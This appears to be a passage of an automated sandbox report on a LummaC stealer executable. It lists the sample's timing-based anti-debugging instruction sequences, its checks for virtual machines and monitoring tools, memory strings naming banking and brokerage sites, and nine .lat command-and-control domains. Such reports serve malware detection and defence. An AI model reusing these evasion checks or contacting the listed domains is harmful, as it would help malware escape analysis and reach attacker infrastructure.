                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E33 second address: 5370E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4BA0D3970Fh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D39710h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E60 second address: 5370E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E66 second address: 5370E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E6C second address: 5370E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E70 second address: 5370E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4BA0D39714h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, edx 0x00000015 mov bh, 8Fh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E97 second address: 5370E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E9D second address: 5370ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4BA0D39711h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3970Dh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370ED2 second address: 5370ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380A5F second address: 5380A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 249AA07Bh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 movsx ebx, cx 0x00000013 pop eax 0x00000014 call 00007F4BA0D39711h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380A86 second address: 5380A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d mov ax, dx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380A97 second address: 5380AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380AA8 second address: 5380AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380AAC second address: 5380AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380AB8 second address: 5380ADF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4EC02E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 08BB9F15h 0x00000014 jmp 00007F4BA0D3F162h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380C0A second address: 5380C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3970Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380C2C second address: 5380C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C11A42E9Ah 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 cmp dword ptr [ebp+08h], 00002000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D3F161h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380C67 second address: 5380C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380C6D second address: 5380C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909C4 second address: 53909CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909CA second address: 53909CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909CF second address: 53909D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909D5 second address: 53909D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909D9 second address: 53909DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909DD second address: 53909EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, ah 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909EC second address: 53909F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909F2 second address: 53909F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909F6 second address: 53909FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53909FA second address: 5390A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3F167h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390A21 second address: 5390A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390A27 second address: 5390A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390A2B second address: 5390A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390A2F second address: 5390ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F4BA0D3F15Dh 0x00000010 pushfd 0x00000011 jmp 00007F4BA0D3F160h 0x00000016 and cx, C158h 0x0000001b jmp 00007F4BA0D3F15Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 mov ebx, esi 0x00000026 call 00007F4BA0D3F160h 0x0000002b mov cx, FD91h 0x0000002f pop ecx 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov edx, ecx 0x00000035 jmp 00007F4BA0D3F166h 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F4BA0D3F15Dh 0x00000045 sub ax, 3106h 0x0000004a jmp 00007F4BA0D3F161h 0x0000004f popfd 0x00000050 push ecx 0x00000051 pop edi 0x00000052 popad 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390ACB second address: 5390B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov bh, ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F4BA0D39717h 0x00000012 test esi, esi 0x00000014 jmp 00007F4BA0D39716h 0x00000019 je 00007F4C11A36FB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F4BA0D3970Dh 0x00000028 and ecx, 530A2D26h 0x0000002e jmp 00007F4BA0D39711h 0x00000033 popfd 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390BDF second address: 5390BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390BEF second address: 5390BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSpecial instruction interceptor: First address: E47C6C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSpecial instruction interceptor: First address: EC8E87 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7508Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7604Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7496Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7504Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7484Thread sleep time: -40020s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeLast function: Thread delayed
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696503903p
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NVMware2
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: SICE
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                Source: jSFUzuYPG9.exe, 00000000.00000002.1975085759.0000000000E69000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: nProgram Manager
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
